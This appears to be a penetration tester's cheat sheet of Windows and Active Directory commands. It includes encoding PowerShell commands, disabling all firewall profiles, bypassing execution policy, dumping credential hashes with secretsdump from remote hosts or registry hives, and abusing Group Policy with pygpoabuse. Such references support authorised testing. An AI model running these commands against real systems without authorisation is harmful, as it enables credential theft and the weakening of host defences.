% powershell encoded
# Convert to an encoded powershell command
iconv -t utf-16le | base64 -w 0 | (echo -n 'powershell -enc '; cat; echo)

% samba server, smb server
# Start a tmp samba server
sudo docker run --rm -it -p 139:139 -p 445:445 -e USERID=$(id -u) -e GROUPID=$(id -g) -v $(pwd):/mount dperson/samba -s 'tmp;/mount;no;no;yes;tmp' -u "tmp;tmp"

% enable winrm
# Enable WinRM
Enable-PSRemoting -Force -SkipNetworkProfileCheck

% disable firewall
# Disable firewall
Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False

% enable ssh
# Enable SSH and change default shell to powershell
Add-WindowsCapability -Online -Name OpenSSH.Server~~~~0.0.1.0; Start-Service sshd; Set-Service -Name sshd -StartupType Automatic
New-ItemProperty -Path "HKLM:\SOFTWARE\OpenSSH" -Name DefaultShell -Value "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -PropertyType String -Force

% install powershell modules
# Install powershell modules
Install-WindowsFeature -Name RSAT-AD-PowerShell; Add-WindowsCapability -Online -Name Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0; Set-ExecutionPolicy Bypass -Force; Install-Module OleViewDotNet; Install-Module NtObjectManager

% psdrive
# Connect a PS drive
$username = "<user>"
$password = ConvertTo-SecureString "<password>" -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential($username, $password)
New-PSDrive -Name "<drive_letter>" -PSProvider FileSystem -Root "<smb_path>" -Credential $cred

$ interface: ip link show | awk -F': ' '{print $2}' | grep .
$ external_ip: ip -f inet addr show <interface> | awk '/inet / {print $2}' | cut -d'/' -f1
$ smb_path: echo '\\'"<external_ip>"'\'"<sharename>"

% secretsdump
@ windows-variables
# secretsdump
secretsdump.py '<user_with_password>:<password_for_user>@<fqdn>'

# secretsdump local
secretsdump.py -sam '<sampath>' -security '<secpath>' -system '<syspath>' LOCAL
$ sampath: find . -type f
$ secpath: find . -type f
$ syspath: find . -type f

% pygpoabuse
@ windows-variables
# pygpoabuse
pygpoabuse.py '<domain>/<user_with_password>:<password_for_user>' -gpo-id '<gpo_id>'

% mssql
# mssql query
<sqlcmdstarter> -Q "<query>"

# mssql list databases
<sqlcmdstarter> -Q "SELECT name FROM sys.databases"

# mssql list tables in database
<sqlcmdstarter> -d "<dbname>" -Q "SELECT name FROM sys.tables"

$ sqlcmdstarter: echo 'sqlcmd.exe -S localhost\SQLEXPRESS -U <user> -P <pass>'
